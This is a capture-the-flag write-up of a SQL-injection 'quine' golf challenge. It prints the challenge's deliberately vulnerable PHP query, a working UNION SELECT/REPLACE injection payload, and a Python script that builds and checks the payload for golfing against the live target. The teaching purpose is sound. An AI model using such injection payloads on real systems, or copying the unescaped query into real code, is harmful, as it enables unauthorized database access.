What is a quine? Let's refer to Wikipedia:
"A quine is a computer program which takes no input and produces a copy of its own source code as its only output. The standard terms for these programs in the computability theory and computer science literature are self-replicating programs, self-reproducing programs, and self-copying programs."
A good wargame example of the same idea applied to SQL is the ouroboros golf challenge on Webhacking.kr.
Below is the problem code:
<?php
include "../../config.php";
login_chk();
print_best_golfer(73);
$db = dbconnect("ouroboros");
if(preg_match("/\./i", $_GET['pw'])) exit("No Hack ~_~");
$query = "select pw from prob_ouroboros where pw='{$_GET['pw']}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['pw']) echo "<h2>Pw : {$result['pw']}</h2>";
if(($result['pw']) && ($result['pw'] === $_GET['pw'])){
    // !!THIS IS PAYLOAD GOLF CHALLENGE!!
    // My solution of ouroboros golf is 210byte.
    // If your solution is shorter than mine, you will get 5 point per 1 byte.
    $len = 210 - strlen($_GET['pw']);
    if($len > 0){
        solve(73,$len * 5);
    }
    else{
        echo "<h2>nice try :)</h2>";
    }
}
highlight_file(__FILE__);
?>
Three things have to hold at once. First, $_GET['pw'] is spliced into the query unescaped, so I can inject SQL; whatever the injected query returns becomes $result['pw']. Second, $result['pw'] must be non-empty and strictly equal (===) to my input, so the query has to return the very string that was injected into it: a SQL quine. Third, the preg_match filter rejects any payload containing a dot, and to score the payload must be shorter than 210 bytes ($len = 210 - strlen($_GET['pw']) has to be positive; each byte saved is worth 5 points).
So it is time to build a quine generator for SQL. The building blocks are REPLACE(), an indirect placeholder ($) that stands for the template itself, and UNION SELECT: the injected query carries a template T twice, once as the string to be transformed and once as the replacement text; REPLACE(T, CHAR(34), CHAR(39)) turns the double quotes in T into the single quotes the outer payload uses, and REPLACE(..., CHAR(36), T) substitutes the template for each $, which reproduces the outer payload exactly.
The simple replacement version, in URL-encoded form (+ is a space, %23 is #, and both copies of the template must be identical), is:
'union+select+replace(replace('"union+select+replace(replace("$",char(34),char(39)),char(36),"$")as+a%23',char(34),char(39)),char(36),'"union+select+replace(replace("$",char(34),char(39)),char(36),"$")as+a%23')as+a%23
This makes $result['pw'] identical to $_GET['pw']. As written it decodes to 211 bytes, one over the 210-byte target, so it prints "nice try :)" rather than scoring; the length can be reduced. For your quine practice, I don't put a correct answer here.
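To make the construction concrete, here is a small generator and checker, added as an example and not part of the original post or the challenge's own code. It builds the payload from the template above, URL-encodes it the way the post writes it, and then emulates what the PHP and MySQL side do with it: the query shape is matched for this one injection form only, MySQL's REPLACE() is modelled with str.replace (REPLACE is plain substring substitution, so this is faithful), and it is assumed that no row in prob_ouroboros has an empty pw, so the UNION SELECT row is the only one returned. The function and variable names are my own.

```python
import re
from typing import Optional
from urllib.parse import quote_plus

# The post's template: `$` marks where the template is re-inserted and `"`
# stands in for the `'` the outer payload needs. Spaces and `#` are literal
# here; the URL form uses `+` and `%23`.
TEMPLATE = '"union select replace(replace("$",char(34),char(39)),char(36),"$")as a#'


def build_payload(template: str = TEMPLATE) -> str:
    """Decoded $_GET['pw']: template with `"` -> `'`, then each `$` -> template."""
    return template.replace('"', "'").replace("$", template)


def to_url(pw: str) -> str:
    """URL-encode the way the post writes it: spaces as `+`, `#` as `%23`."""
    return quote_plus(pw, safe="'\"(),$")


# Shape of the PHP-built query once the payload is spliced in. Only this
# injection shape is modelled (assumption). T contains no `'`, so [^']* delimits
# each copy even though T itself contains `#`; the `#` after the closing `)`
# comments out PHP's trailing quote, as MySQL would.
QUERY_SHAPE = re.compile(
    r"^select pw from prob_ouroboros where pw=''union select "
    r"replace\(replace\('([^']*)',char\(34\),char\(39\)\),char\(36\),'([^']*)'\)"
    r"(?:as \w+)?#.*$"
)


def run_query(pw: str) -> Optional[str]:
    """Emulate MySQL on the PHP query for the union/replace shape above.

    Assumes no row has pw='' (so the only row is the UNION SELECT one).
    Returns $result['pw'], or None when the query does not have that shape."""
    query = f"select pw from prob_ouroboros where pw='{pw}'"  # as in the PHP
    m = QUERY_SHAPE.match(query)
    if m is None:
        return None
    t_literal, t_insert = m.group(1), m.group(2)
    inner = t_literal.replace(chr(34), chr(39))  # replace(T, char(34), char(39))
    return inner.replace(chr(36), t_insert)      # replace(..., char(36), T)


def challenge_check(pw: str, par: int = 210) -> dict:
    """Mirror the PHP decision logic: dot filter, fixed point, then golf score."""
    if "." in pw:                                   # preg_match("/\./i", ...)
        return {"ok": False, "message": "No Hack ~_~"}
    result = run_query(pw)
    if not result or result != pw:                  # $result['pw'] === $_GET['pw']
        return {"ok": False, "message": "not a fixed point"}
    saved = par - len(pw)                           # $len = 210 - strlen(pw)
    if saved > 0:
        return {"ok": True, "length": len(pw), "points": saved * 5, "message": "solved"}
    return {"ok": True, "length": len(pw), "points": 0, "message": "nice try :)"}


if __name__ == "__main__":
    pw = build_payload()
    print(len(pw), "bytes")
    print(to_url(pw))
    print(challenge_check(pw))
```

Because build_payload() takes the template as a parameter and the query matcher accepts any (or no) column alias, you can golf the template and re-run challenge_check() locally until the fixed point holds and the byte count drops below 210, before sending anything to the real target.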
END